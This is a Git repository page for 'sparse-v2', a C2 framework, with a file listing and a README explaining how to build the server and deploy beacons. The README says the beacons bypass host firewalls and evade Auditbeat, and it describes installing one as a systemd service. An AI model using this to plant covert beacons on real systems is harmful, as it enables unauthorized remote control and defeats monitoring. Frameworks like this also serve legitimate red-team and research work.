andrew.rioux/sparse-v2
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
61 Commits 1 Branch 0 Tags
Go to file
Clone
Open with VS Code Open with VSCodium Open with Intellij IDEA
Download ZIP Download TAR.GZ Download BUNDLE
Andrew Rioux 65bed79678
docs: add basic docs to get started
2025-10-21 13:26:19 -04:00
.cargo
feat: prep work for web UI
2025-01-22 01:21:54 -05:00
nl-sys
feat: added tcp
2025-02-12 17:49:31 -05:00
packets
feat: added tcp
2025-02-12 17:49:31 -05:00
pcap-sys
feat: made sure everything worked on Windows
2025-02-14 13:43:38 -05:00
sparse-actions
fix: swap command executors for Windows and Linux
2025-10-21 08:19:32 -04:00
sparse-beacon
fix: don't crash the beacon if an action fails
2025-10-21 08:19:57 -04:00
sparse-handler
feat: added download and upload commands
2025-03-03 20:03:04 -05:00
sparse-server
feat: added download and upload commands
2025-03-03 20:03:04 -05:00
sparse-unix-beacon
feat: added download and upload commands
2025-03-03 20:03:04 -05:00
sparse-unix-infector
feat: reworked command processing and storage
2025-02-23 18:29:12 -05:00
sparse-unix-installer
feat: reworked command processing and storage
2025-02-23 18:29:12 -05:00
sparse-windows-beacon
feat: added download and upload commands
2025-03-03 20:03:04 -05:00
sparse-windows-infector
feat: reworked command processing and storage
2025-02-23 18:29:12 -05:00
sparse-windows-installer
feat: reworked command processing and storage
2025-02-23 18:29:12 -05:00
unix-loader
fix: fixed PE infection
2025-02-19 22:40:39 -05:00
.envrc
feat: initial commit with build system
2025-01-19 20:46:46 -05:00
.gitignore
feat: added basic command issuing
2025-02-23 01:46:18 -05:00
build_common.rs
feat: fixed pcap linking and added nix packages
2025-01-20 20:40:34 -05:00
Cargo.lock
feat: added download and upload commands
2025-03-03 20:03:04 -05:00
Cargo.toml
feat: added beacon installer generation, download
2025-02-02 02:37:53 -05:00
deny.toml
feat: fixed pcap linking and added nix packages
2025-01-20 20:40:34 -05:00
flake.lock
feat: fixed server comp, added ELF inject
2025-02-04 16:42:05 -05:00
flake.nix
fix: refer to a longer lasting release of FreeBSD
2025-10-21 12:44:58 -04:00
LICENSE
feat: fixed pcap linking and added nix packages
2025-01-20 20:40:34 -05:00
LICENSE.winpcap
feat: fixed pcap linking and added nix packages
2025-01-20 20:40:34 -05:00
packages.nix
fix: actually fixed Docker images
2025-02-25 02:55:54 -05:00
README.org
docs: add basic docs to get started
2025-10-21 13:26:19 -04:00
system-libs.nix
fix: got everything to compile
2025-02-15 19:01:37 -05:00
taplo.toml
feat: fixed pcap linking and added nix packages
2025-01-20 20:40:34 -05:00

README.org

Sparse-v2 C2 framework

Design

Sparse v2 is a C2 beacon designed to weaponize libpcap to bypass local host based filtration and auditing. It writes and reads directly from the systems network interface card, creating an alternate TCP/IP stack that does not follow the same rules as the rest of the networking on the host system.

It is designed to take advantage of ideas put forward in this blog post: https://andrew.riouxs.co/articles/20251017-direct-network-access.html

Developer setup

This project uses nix flakes. To set up a developer environment, install the Nix package manager (https://nixos.org/download/) and enable Flakes (https://nixos.wiki/wiki/Flakes). With these requirements met, run:

nix develop
setup-dev-environment

Building

Building Sparse requires the same developer tooling that a developer shell requires, Nix configured to allow Flakes. To build sparse v2 in its entirety, run:

nix build .#sparse-server-docker
docker load < result

Listeners, configurations, categories, templates, instances, commands

These are the abstractions used to represent beacons and the management of beacons deployed on a network.

  • Listeners use a certificate authority and listen on a specific port to allow a beacon to perform callbacks. The port specified must not be changed by any NAT or port forwarding rule, and the IP address must be the public IP address before any NAT
  • Configurations represent how a beacon should perform a callback, whether that is via a specific timetable or only once after executing. Also allows adding random jitter to the callback period
  • Categories are used to sort incoming connections, and when issuing commands can expose a range of targets to apply the command to
  • Templates represent the actual beacon that is to be installed on a system and all the configuration that comes with it
  • Instances are callbacks created by a deployed beacon, and can be issued commands
  • Commands are issued to beacon instances or categories

Running

Running sparse will require knowing what ports to use for HTTPS access for the beacons. For the most common use case of port 443, the following Docker compose file should work:

services:
  server:
    image: sparse-server:latest
    volumes:
      - ./files:/sparse-server
    ports:
      - '443:443'
      - '3000:3000'
    restart: always

Once deployed, add the first user with the following command:

docker compose exec server /bin/sparse-server user create -n USERNAME

Once deployed, the management interface is available at port 3000 over HTTP.

Deploying a beacon

  • Add a listener with a port that matches the port specified in the docker compose and allowed through NAT, and use an IP address that can be routed to this C2 server
  • Add a configuration to perform a periodic callback
  • Add a template, selecting the prior listener and configuration. It will need an IP address that corresponds to the LAN that the beacon will be running on
  • Download the beacon, and install it as a systemd service on Linux. It should be able to perform callbacks, even if blocked locally using iptables. Auditbeat will be unable to detect the beacon performing callbacks
Description
No description provided
Readme AGPL-3.0 447 KiB
Languages
Rust 90.3%
Nix 5.7%
Zig 1.9%
SCSS 1.6%
C 0.5%